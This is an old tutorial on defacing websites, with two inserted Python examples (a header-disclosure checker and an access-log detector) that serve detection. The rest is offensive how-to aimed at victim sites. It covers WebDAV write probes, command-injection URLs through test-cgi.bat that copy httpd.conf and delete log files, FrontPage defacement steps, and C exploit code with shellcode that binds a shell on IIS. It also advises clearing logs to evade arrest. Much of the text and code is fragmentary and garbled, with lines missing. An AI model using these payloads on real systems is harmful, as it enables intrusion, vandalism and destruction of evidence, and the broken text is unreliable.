Defacing Websites
www.packetstormsecurity.com
These sites even offer the exploit code and the method of
exploitation. You can also discover new vulnerabilities in web
servers and sites through a web security scanner.
Tools of Trade
GET / HTTP/1.1\r\n\r\n
Host:server-software
<enter>
<enter>
<enter>
Connection: close
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
on this server.<P>
<HR>
RESS>
</BODY></HTML>
Okay, I hope you have figured out what I mean. This is simply the
response you get over telnet. Here is what to do: telnet to a web
server or website on port 80.
NOTE: I have telnetted to the domain name; you can telnet to the IP
address as well.
After telnetting to the web server or website, you will get a blank
screen. In that blank screen, type a request such as
GET / HTTP/1.1\r\n\r\n, then type something like
Host:server-software and press <enter> a few times until you get
the server's response. The server will respond with its software
information.
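As an added example (not part of the original tutorial), here is a small Python script a server administrator can use to check what their own server reveals in its Server and X-Powered-By headers. It builds a well-formed HTTP/1.1 request (the Host header belongs before the blank line that ends the headers) and parses a constructed 403 response modelled on the one shown above; the host name example.test and the sample response are assumptions, not captured from any real host.

```python
import re

# Constructed sample response, modelled on the 403 shown in the tutorial
# (not captured from any real server).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 403 Forbidden\r\n"
    b"Date: Tue, 12 Mar 2002 10:00:00 GMT\r\n"
    b"Server: Microsoft-IIS/5.0\r\n"
    b"Connection: close\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY></BODY></HTML>"
)

# Matches a "/<digit>" product/version separator such as "IIS/5.0" or "Apache/2.4.1".
VERSION_RE = re.compile(r"/\d")


def build_request(host, path="/"):
    """Return a well-formed HTTP/1.1 request. The Host header must come
    before the empty line that terminates the header block; sending the
    blank line first (as the tutorial's keystroke sequence does) ends the
    request early."""
    return (
        f"HEAD {path} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"
    ).encode("ascii")


def parse_response(raw):
    """Split a raw HTTP response into (status code, header dict, body).
    Header names are lower-cased because HTTP header names are case-insensitive."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    _version, status, _reason = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return int(status), headers, body


def server_disclosure(headers):
    """Return the headers that leak a product version (empty dict if none).
    A bare product name such as "Apache" is not flagged; "Apache/2.4.1" is."""
    leaks = {}
    for name in ("server", "x-powered-by"):
        value = headers.get(name)
        if value and VERSION_RE.search(value):
            leaks[name] = value
    return leaks


if __name__ == "__main__":
    status, headers, _ = parse_response(SAMPLE_RESPONSE)
    print("request to send:", build_request("example.test"))
    print("status:", status)
    print("version disclosure:", server_disclosure(headers) or "none")
```

The disclosure check is what a hardening review looks for: the version string the tutorial fingerprints is exactly what `ServerTokens Prod` (Apache) or header-rewriting on IIS removes, and the same parser works on a response captured from your own server with `socket` and `build_request`.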
READ ACCESS
Whenever you visit a website through your web browser, you type
in the domain name. Do you know what happens when you type in
the domain name? When you type in the domain name and press
enter, you are connected to port 80 (the HTTP port) of the IP
address linked with the domain name.
For Example
WRITE ACCESS
Well, this technique was employed and executed years ago. Soon,
computer enthusiasts realized that this kind of technique was a
huge security threat, so they developed new techniques to subdue
it. Nowadays, web servers are designed and configured to give
write access only to selected virtual directories.
TIP: Try telnetting to a web server and find out some good
information about the server and its behavior.
Connected to www.hackingtheworld.ilitehost.com.......
PROPFIND / HTTP/1.1
Host:iis-server
Content-Length:0
Well, you must be wondering how you can test write access
permission for a particular directory in IIS server.
Host: iis-server
Content-Length: 10 <enter><enter>
Once you make this request, the server should respond with a
100 Continue message.
Server: Microsoft-IIS/5.0
XXXXXXXXXX
Server: Microsoft-IIS/5.0
Location: http://iis-server/dir/my_file.txt
Content-Length: 0
If the server responds with this 201 Created response then the
write permission is enabled.
EXECUTION ACCESS
Server side pages like ASP, PHP, JSP or DLL are used in highly
advanced database driven dynamic websites, which dynamically
generate the HTML and send it to the client (web browser).
These server side pages and other executables, including DLL and
EXE files, need execute permission in the virtual directory where
they are kept.
NOTE: DLL, EXE and similar executables need execute permission;
they are usually kept in a single virtual directory.
DIRECTORY SURFING
Well, if you are not familiar with Apache, let me give you a brief
description. Apache is a web server that you configure using
directives and scripts. These are kept in the httpd.conf file, in
the c:\apache group\apache\conf folder of a default Apache
installation on a typical Windows system. This file contains all
the settings of the web server, and if we get our hands on it, we
learn all of the server's settings, including the location of log
files, directory permissions, write access, authentication levels
and so on.
So, now let's get on with the exploit. As we know, Apache is the
most popular web server. This web server ships a .bat file in its
cgi-bin directory, named test-cgi.bat. The purpose of this .bat file
is to test the privileges of the cgi-bin directory.
NOTE: cgi-bin directory contains all the CGI and Perl scripts.
NOTE: If you don't know how to type the | (pipe) character, don't
worry. To type the pipe character press Shift+\; the \ key is just
beside your backspace key.
http://www.target.com/cgi-bin/test-cgi.bat?|copy+..\conf\httpd.conf+..\htdocs\httpd.conf
Through the above URL, I have copied the httpd.conf file out of the
conf directory. The conf directory is normally not readable from
the Apache web root, that is, the htdocs virtual folder. Now we can
easily download the httpd.conf file using the following URL:
http://target.com/httpd.conf
http://www.securityfocus.com
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com
Well, I must say, this is the most exciting part of this tutorial.
Okay, so www.victim.com is the target site. Through the methods I
explained earlier in the tutorial, we have found out that the
website is running on Microsoft IIS server software. So, it is time
to find a vulnerability; I am using Acunetix Web Security Scanner
to scan for vulnerabilities. You must know programming languages
like Perl or C, and socket programming; this is essential because
it lets you compile the exploits. Once you find a vulnerability,
try exploiting it by executing it in your client (browser).
You will get a blank screen; type GET and keep pressing enter
until the web server responds to your request.
GET <ENTER><ENTER>
http://www.victimserver.com/main.asp
http://www.victimserver.com/index.html
http://www.victimserver.com/index.htm
http://www.victimserver.com/index.asp
http://www.victimserver.com/main.htm
http://www.victimserver.com/default.htm
http://www.victimserver.com/default.asp
http://www.victimserver.com/default.html
Now, open Web Publishing Wizard and follow the steps given below.
- Browse to the file that you are going to upload. Here, index.html
is the file we are going to upload.
- You get a screen where you have to name the web server. Type in
anything and click on Advanced.
- Select the service provider from the drop-down box. This is
nothing but the kind of upload it is going to do. Since your
motive is to deface the site, select the "FrontPage Extended Web"
option; this method of defacing works only for FrontPage enabled
sites.
- Type the URL of the victim server's homepage in the given box;
here it is www.victim.com/index.html.
- Here specify the URL that you type in the web browser to access
the victim server's website.
- Select the connection method that you use to access the internet.
Well, I think it's better that you write your own exploit code, in
Perl or C, in order to break into websites.
TIP: If you do not want to get busted, you must clear the log files
after you break into a web server.
CLEARING LOGS
You must clear the logs in order to save yourself from getting
busted. You can use the cross site scripting vulnerability to clear
the log files, by executing the following URL:
http://www.target.com/cgi-bin/test-cgi.bat?|/DEL+..\log\*.*
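An added example, not from the tutorial: a Python detector, run over constructed access-log lines, that flags the request patterns described in the WRITE ACCESS, DIRECTORY SURFING and CLEARING LOGS sections (PROPFIND/PUT probes, a 201 Created after PUT, pipe characters passed to test-cgi.bat, `..` traversal, retrieval of httpd.conf and deletion of the log directory). The log lines, IP addresses and timestamps are constructed for the example; the log format is Common Log Format, and findings are returned as objects so they can be fed to whatever alerting you use.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import unquote

# Constructed sample access log in Common Log Format (not from any real server).
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [12/Mar/2002:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1043',
    '10.0.0.7 - - [12/Mar/2002:10:02:11 +0000] "PROPFIND / HTTP/1.1" 207 512',
    '10.0.0.7 - - [12/Mar/2002:10:02:40 +0000] "PUT /dir/my_file.txt HTTP/1.1" 201 0',
    '10.0.0.9 - - [12/Mar/2002:10:05:03 +0000] "GET /cgi-bin/test-cgi.bat?%7Ccopy+..\\conf\\httpd.conf+..\\htdocs\\httpd.conf HTTP/1.0" 200 88',
    '10.0.0.9 - - [12/Mar/2002:10:05:30 +0000] "GET /httpd.conf HTTP/1.0" 200 12044',
    '10.0.0.9 - - [12/Mar/2002:10:06:00 +0000] "GET /cgi-bin/test-cgi.bat?|/DEL+..\\log\\*.* HTTP/1.0" 200 0',
    '10.0.0.5 - - [12/Mar/2002:10:07:00 +0000] "POST /login.asp HTTP/1.1" 302 0',
])

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Methods that modify content or enumerate WebDAV; a static site should never see them.
WRITE_METHODS = {"PUT", "DELETE", "PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE"}


@dataclass
class Finding:
    line_no: int
    ip: str
    method: str
    target: str
    status: int
    reasons: list = field(default_factory=list)


def analyse_line(line_no, line):
    """Return a Finding for a suspicious log line, or None for benign/unparseable lines."""
    m = CLF_RE.match(line)
    if not m:
        return None
    method = m["method"]
    status = int(m["status"])
    # Percent-decode so %7C and a literal | are treated alike, then lower-case.
    target = unquote(m["target"]).lower()
    reasons = []

    if method in WRITE_METHODS:
        reasons.append("write/WebDAV method")
        if method == "PUT" and status == 201:
            reasons.append("PUT succeeded (201 Created): write access is enabled")
    if "test-cgi" in target and "|" in target:
        reasons.append("shell metacharacter passed to test-cgi")
        if re.search(r"\bdel\b", target) and "log" in target:
            reasons.append("log deletion attempt")
    if ".." in target:
        reasons.append("path traversal")
    if target.split("?")[0].endswith("httpd.conf"):
        reasons.append("web server configuration requested")

    if not reasons:
        return None
    return Finding(line_no, m["ip"], method, m["target"], status, reasons)


def scan(log_text):
    """Run analyse_line over every line of a log and collect the findings."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        f = analyse_line(n, line)
        if f is not None:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no} {f.ip} {f.method} {f.target} -> {f.status}: {', '.join(f.reasons)}")
```

The last sample line is the one the tutorial's log-clearing trick produces, which is why a detector only has value if the log is shipped to a separate host (syslog, a collector) before the attacker reaches it: a PUT that returns 201 and a request that ends in `DEL+..\log\*.*` are both things you want to see on a box the attacker cannot write to.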
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet.
keji@chinansl.com
*/
#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
if(argc != 4)
return 0;
DWORD srcdata=0x01e2fb1c-4;//0x00457474;
//address of SHELLCODE
char* destIP=argv[1];
char* destFile=argv[3];
int webport=atoi(argv[2]);
WSADATA ws;
SOCKET s;
long result=0;
if(WSAStartup(0x0101,&ws) != 0)
puts("WSAStartup() error");
return -1;
addr.sin_family=AF_INET;
addr.sin_port=htons(webport);
addr.sin_addr.s_addr=inet_addr(destIP);
s=socket(AF_INET,SOCK_STREAM,0);
if(s==-1)
return -1;
return -1;
char buff[4096];
char* shellcode="\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33\xc9\x89"
"\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65\x6c\x33\x32"
"\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32\x2e\xab"
"\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32\xc0\x4f"
"\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53\xff\xd0\x89"
"\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53\xff\xd0"
"\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75\xfc\xff\xd3\x89"
"\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6\x66\xbe"
"\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66\xbe\x3e\x02\x56"
"\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56\xff\x75\xfc"
"\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75\xfc\xff\xd3\x89"
"\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\xfc\xff\xd3\x89"
"\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\xfc\xff\xd3\x89"
"\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45\xe0\x6a"
"\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8\xff\xd3"
"\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3\x89\x45"
"\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13\xff\x75\xf8"
"\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45\xc8\x6a"
"\x03\xff\x75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\x8d\x7d\xa0\x32"
"\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0\xab\xf7\xd0"
"\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8\xab\x33\xc0"
"\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50\xff\x55"
"\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4\x6a\x10"
"\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75\xc4\xff"
"\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45\xc0\x33"
"\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50\xff\x55"
"\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45\x94\x50"
"\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44\x32\xc0"
"\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01\x89\x47"
"\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89\x47\x3c"
"\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85\x38\xff"
"\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51\x53\xff"
"\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\xff\xff\xff\x89"
"\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\xff\xff\xff\x50"
"\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\xff\xff\xff\x85"
"\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\xff\xff\x50\x53"
"\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0\x74\x6d"
"\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff"
"\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90\x90\x90"
"\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90\x33\xc0"
"\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0\xff\x55\xc8"
"\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50\x8d\x85"
"\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff"
"\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4\xff\x75\xc4"
"\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\xff\xff\xff\x6a"
"\xff\xff\x95\x18\xff\xff\xff";
form-urlencoded\r\n";
char* s5="Transfer-Encoding: chunked\r\n\r\n";
char* sc="0\r\n\r\n\r\n";
char shellcodebuff[1024*8];
memset(shellcodebuff,0x90,sizeof(shellcodebuff));
memcpy(&shellcodebuff[sizeof(shellcodebuff)-strlen(shellcode)-1],shellcode,strlen(shellcode));
shellcodebuff[sizeof(shellcodebuff)-1] = 0;
char sendbuff[1024*16];
memset(sendbuff,0,1024*16);
sprintf(sendbuff,"%s%s?%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s", s1, destFile, shellcodebuff, s2, destIP, s4, s5, pad/*,srcdata,jmpaddr*/, sc);
int sendlen=strlen(sendbuff);
result=send(s,sendbuff,sendlen,0);
if(result == -1 )
return -1;
memset(buff,0,4096);
result=recv(s,buff,sizeof(buff),0);
if(strstr(buff,"<html>") != NULL)
shutdown(s,0);
closesocket(s);
puts("Send shellcode error!Try again!");
return -1;
shutdown(s,0);
closesocket(s);
puts("If you cannot connect to the host,try run this program again!");
return 0;
To use the C code, you must compile it and run it. Now, you must
be wondering what the use of this code is. The C code causes an
overflow in IIS on Windows 2000 and makes the system bind a shell
to the source IP on port 1111. So, once the exploit works, there
will be a shell bound on port 1111 on the target system. To use it,
telnet to the target IP on port 1111; through this you will be
connected to the system without any kind of authentication.
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies. Every day thousands of
websites are defaced. Even government websites are defaced, for
different reasons; the most common reason is cyber war. Just as in
reality there are wars between two rival countries, in the wired
world there are cyber wars.
If you want to see the web attack archive, visit the following site:
http://defaced.alldas.org
- First of all, you must coordinate and organize your web root
with suitable directories. What I mean is that you must organize
your files: images in an image directory, one directory for server
side content, and so on. If you don't configure your web root
properly, your web server will be prone to many attacks.
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com
Well, every web server is vulnerable, but you must not fear; you
must download the latest patches for each particular vulnerability.
The last thing is that you must be able to predict the moves of a
malicious cracker or a script kiddie. You need to know how a
cracker breaks into your site or web server, you need to know the
motive behind the attack, and you must think, act and work like a
hacker in order to take the cracker out at the root.